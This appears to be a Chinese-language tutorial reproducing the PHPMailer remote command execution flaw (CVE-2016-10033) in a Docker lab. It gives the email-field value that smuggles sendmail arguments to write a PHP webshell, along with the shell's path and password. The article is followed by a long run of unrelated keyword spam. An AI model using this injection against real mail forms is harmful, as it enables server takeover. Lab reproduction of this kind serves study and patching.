PHPMailer中怎么复现远程命令执行漏洞
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,PHPMailer中怎么复现远程命令执行漏洞,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。一、漏洞简介PHPMailer是PHP电子邮件
千家信息网最后更新 2025年02月01日PHPMailer中怎么复现远程命令执行漏洞
PHPMailer中怎么复现远程命令执行漏洞,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
一、漏洞简介
PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。
二、影响版本:
PHPMailer<5.2.18
三、漏洞复现
Docker环境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去镜像启动环境:
http://192.168.1.107:8080/
http://192.168.1.107:8080/在name处随便输入比如"aaa",在email处输入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:
上传完一句话木马后,页面会响应3-5分钟,响应时间较长
木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld
虚拟终端:
使用脚本:
获取脚本后台回复"PHPMailer"获取脚本
看完上述内容,你们掌握PHPMailer中怎么复现远程命令执行漏洞的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!
漏洞
木马
脚本
输入
命令
一句话
内容
方法
更多
版本
环境
问题
安全
束手无策
为此
上下
上下文
代码
原因
后台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
战意四个服务器都是哪
饥荒联机版分服务器吗
个人电脑网络安全保护方法
西安软通动力网络技术疫情
安徽浪潮服务器供应商
软件开发的商业计划书
中国网络安全技术增速
cs架构测试软件开发
网络安全方向词语
材料数据库 论文
网络安全法案名
传统公司要服务器可以做什么
华为软件开发简历
中牟安卓软件开发
阿里云数据库db
魔域与服务器连接中断
和数据库的通信
网络安全宣传牌怎么制作
使命召唤全部服务器
学信网查重有本科数据库吗
统计用什么数据库好
op网络技术
甲骨文美国数据库
cnv结果数据库查询
如何查找数据库字段
瑞尔地产数据库
卢龙县网络安全工作
机器学习模型服务器
idea数据库配置文件在哪里
网络安全管理中心官网
